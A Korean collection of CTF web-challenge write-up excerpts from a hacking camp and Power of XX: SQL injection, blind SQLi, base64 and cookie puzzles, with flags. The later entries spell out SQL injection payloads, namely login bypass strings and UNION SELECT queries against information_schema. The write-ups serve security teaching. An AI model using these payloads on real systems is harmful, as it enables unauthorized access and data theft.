교수님 이건 아니잖아요

안녕하세요. 2023년 2월 11일 ~ 12일 사이에 진행된 동계 해킹캠프의 Web 문제 출제자입니다. 문제 화면입니다. 이 문제는 SQL Injection 문제입니다. 문제 description을 보시면 노래의 일련번호(serial_number)를 찾아달라고 합니다. 먼저 노래의 제목은 구글링하시면 알 수 있습니다. 이 노래의 제목은 Banana Shake 인데요, input에 노래 제목을 검색해보겠습니다. 제목을 검색하면 노래 제목과 가수, 노래 순서가 표로 출력됩니다. 일련번호는 DB에서 찾아내야 합니다. 여기서 힌트를 잠시 보겠습니다. 소스코드를 보시면 테이블 명이 나와있네요. 또 일련번호의 길이는 모두 같다고 합니다. input에는 다음과 같은 여러가지 필터링이 걸려있습니다. or, and, u..

2021년 Power of XX에서 제작했던 pepero day의 write-up입니다. 처음 화면입니다. 양 쪽에 있는 빼빼로를 클릭하면 힌트를 얻을 수 있습니다. [힌트] Today is Pepero Day! input에 넣을 값에 대한 힌트였습니다. input에 빼뺴로 데이의 날짜인 11/11을 입력하면 base64로 인코딩 된 문자열이 나오게 됩니다. base64로 인코딩 된 문자열 : cDFlMVBlUjVEYTI= *잘못된 값을 입력하면 다음 문구를 띄웁니다. base64 디코더에 해당 문구를 넣어보겠습니다. 그럼 아래와 같은 문자열이 나오게 됩니다. p1e1PeR5Da2 이 문자열을 다시 input에 넣어 보겠습니다. 플래그가 출력됩니다. POX{P4p4r0_1n_Th9_W0RLD}

2021년 Power of XX에서 제작했던 Find admin's Password 문제의 Write-up입니다. 문제 설명 admin의 비밀번호를 찾아보세요! Find admin's Password는 admin 계정의 비밀번호를 찾는 Blind SQL 문제입니다. 처음 화면입니다. id와 pw에 guest/guest를 입력하면 hello guest를 띄웁니다. SQL 인젝션을 시도하기 위해 참인 쿼리를 보내면 특수문자 몇 개가 필터링되어 있다는 것을 알 수 있습니다. 필터링 되는 문자를 입력하면 filtering이라는 문구를 띄웁니다. 필터링 되는 문자는 소스 코드에 힌트로 나와있습니다. 이제 필터링되는 문자를 우회해서 admin의 패스워드를 알아내기 위해 blind sql 인젝션을 시도하시면 됩니다...

2022년 24회 해킹캠프 CTF에서 출제했던 delicious cookie 문제에 대한 write up입니다. 문제에 들어가면 다음과 같은 화면이 보입니다. 소스코드를 보면 주석으로 제공된 힌트를 확인하실 수 있습니다. chocolate is better than cookie. cookie에서 눈치채신 분들이 계실 것 같습니다. 해당 웹사이트의 쿠키를 확인하시면 dessert라는 이름의 쿠키에 cookie라는 값이 들어가 있는 걸 확인하실 수 있습니다. 해당 값을 chocolate으로 변경해보겠습니다. 필자는 cookie editor를 사용해 변경하였습니다. 새로고침하면 화면에는 아무 일도 일어나지 않습니다. 대신 소스코드를 확인하면 주석이 하나 더 생긴 것을 확인할 수 있습니다. candy is be..

id : guest pw : guest admin으로 로그인해야 함을 알 수 있고, 힌트로 query를 보여주고 있다. 쿼리 select id from users where id='{$_GET["id"]}' and pw='{$_GET["pw"]}' id : admin' or 1=1# pw : 1 or이 필터링된다는 것을 알 수 있다. or대신 ||을 사용해 공격을 시도했다. id : admin' || '1'='1 pw : 1 공격을 성공할 수 있었다.

참인 쿼리 입력 ' or 1=1# 책 정보가 출력되었다. 컬럼 개수 알아내기 order by는 전체 컬럼 개수보다 더 큰 값을 입력하면 오류 발생 1' order by 1# 9개에서 오류 발생 → 컬럼 개수가 8개인 것을 알아냄 union을 사용해 인젝션 시도 DB명 알아내기 ' union select 1,2,3,4,schema_name,6,7,8 from information_schema.schemata# ' union select 1,2,3,4,database(),6,7,8 # sqli102 테이블명 알아내기 sqli102에서 테이블명 출력 ' union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=..